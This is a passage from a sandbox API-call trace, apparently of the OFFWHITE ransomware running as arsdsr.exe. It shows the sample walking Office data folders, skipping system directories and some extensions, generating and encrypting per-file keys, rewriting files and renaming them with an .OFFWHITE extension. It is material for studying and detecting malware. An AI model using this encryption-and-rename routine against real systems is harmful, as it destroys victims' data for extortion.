RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.421] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.421] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.421] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0146.421] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.421] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.421] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0146.421] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.421] SetLastError (dwErrCode=0x0) [0146.421] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.431] GetLastError () returned 0x0 [0146.432] GetLastError () returned 0x0 [0146.432] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.432] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0146.432] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x3b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.432] WriteFile (in: hFile=0x218, lpBuffer=0x546f18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546f18*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0146.432] GetProcessHeap () returned 0x500000 [0146.432] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3960) returned 0x5607c8 [0146.432] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.432] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x3960, lpOverlapped=0x0) returned 1 [0146.452] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.452] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x3960, lpOverlapped=0x0) returned 1 [0146.453] GetProcessHeap () returned 0x500000 [0146.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.453] CloseHandle (hObject=0x218) returned 1 [0146.453] GetProcessHeap () returned 0x500000 [0146.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.453] GetProcessHeap () returned 0x500000 [0146.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.453] GetProcessHeap () returned 0x500000 [0146.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.453] GetProcessHeap () returned 0x500000 [0146.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.453] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" [0146.453] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.OFFWHITE" [0146.453] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.offwhite")) returned 1 [0146.454] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0146.454] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0146.454] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0xdfea7b52, cFileName="3082", cAlternateFileName="")) returned 0 [0146.454] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.454] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 0 [0146.454] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.454] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="...") returned 1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="windows") returned -1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$recycle.bin") returned 1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="rsa") returned -1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="ntuser.dat") returned 1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="programdata") returned -1 [0146.454] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="appdata") returned 1 [0146.455] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="program files") returned -1 [0146.455] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="program files (x86)") returned -1 [0146.455] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.455] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="OfficeSoftwareProtectionPlatform" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform" [0146.455] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" [0146.455] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" [0146.455] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*" [0146.455] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.456] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.456] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.456] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.456] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.456] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Cache", cAlternateFileName="")) returned 1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="...") returned 1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="windows") returned -1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="$recycle.bin") returned 1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="rsa") returned -1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="ntuser.dat") returned -1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="programdata") returned -1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="appdata") returned 1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="program files") returned -1 [0146.456] lstrcmpiW (lpString1="Cache", lpString2="program files (x86)") returned -1 [0146.456] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\" [0146.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\", lpString2="Cache" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0146.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\" [0146.456] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\" [0146.456] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*" [0146.456] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x840082, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.457] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.457] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9de525d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x840082, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.457] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.457] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.457] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x840082, dwReserved1=0x295e370, cFileName="cache.dat", cAlternateFileName="")) returned 1 [0146.457] lstrcmpiW (lpString1="cache.dat", lpString2=".") returned 1 [0146.457] lstrcmpiW (lpString1="cache.dat", lpString2="..") returned 1 [0146.457] lstrcmpiW (lpString1="cache.dat", lpString2="...") returned 1 [0146.457] lstrcmpiW (lpString1="cache.dat", lpString2="windows") returned -1 [0146.457] lstrcmpiW (lpString1="cache.dat", lpString2="$recycle.bin") returned 1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="rsa") returned -1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="ntuser.dat") returned -1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="programdata") returned -1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="appdata") returned 1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="program files") returned -1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="program files (x86)") returned -1 [0146.458] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\" [0146.458] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\", lpString2="cache.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0146.458] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.458] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.458] PathFindExtensionW (pszPath="cache.dat") returned=".dat" [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".cab") returned 1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".cmd") returned 1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".com") returned 1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".cpl") returned 1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".url") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".mp3") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".pif") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".mp4") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".OFFWHITE") returned -1 [0146.458] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0146.458] lstrcmpiW (lpString1="cache.dat", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0146.458] GetProcessHeap () returned 0x500000 [0146.458] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f28 [0146.458] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0146.461] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=262768) returned 1 [0146.461] GetProcessHeap () returned 0x500000 [0146.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.461] GetProcessHeap () returned 0x500000 [0146.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.461] GetProcessHeap () returned 0x500000 [0146.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.461] GetProcessHeap () returned 0x500000 [0146.461] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.461] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.461] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.461] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.461] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.461] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.461] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.461] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.461] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.461] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.462] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.462] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.462] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.462] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x40270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.462] SetLastError (dwErrCode=0x0) [0146.462] WriteFile (in: hFile=0x214, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0146.468] GetLastError () returned 0x0 [0146.468] GetLastError () returned 0x0 [0146.468] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x40370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.468] WriteFile (in: hFile=0x214, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0146.468] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x40470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.468] WriteFile (in: hFile=0x214, lpBuffer=0x546f28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x546f28*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0146.468] GetProcessHeap () returned 0x500000 [0146.468] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x40270) returned 0x5607c8 [0146.468] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.468] ReadFile (in: hFile=0x214, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x40270, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d840*=0x40270, lpOverlapped=0x0) returned 1 [0146.486] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.486] WriteFile (in: hFile=0x214, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x40270, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d84c*=0x40270, lpOverlapped=0x0) returned 1 [0146.487] GetProcessHeap () returned 0x500000 [0146.487] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.487] CloseHandle (hObject=0x214) returned 1 [0146.487] GetProcessHeap () returned 0x500000 [0146.487] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.487] GetProcessHeap () returned 0x500000 [0146.487] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.487] GetProcessHeap () returned 0x500000 [0146.487] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.487] GetProcessHeap () returned 0x500000 [0146.487] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.488] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" [0146.488] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.OFFWHITE" [0146.488] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.offwhite")) returned 1 [0146.488] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de525d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x9de525d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2caa5f40, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40270, dwReserved0=0x840082, dwReserved1=0x295e370, cFileName="cache.dat", cAlternateFileName="")) returned 0 [0146.488] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.489] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: 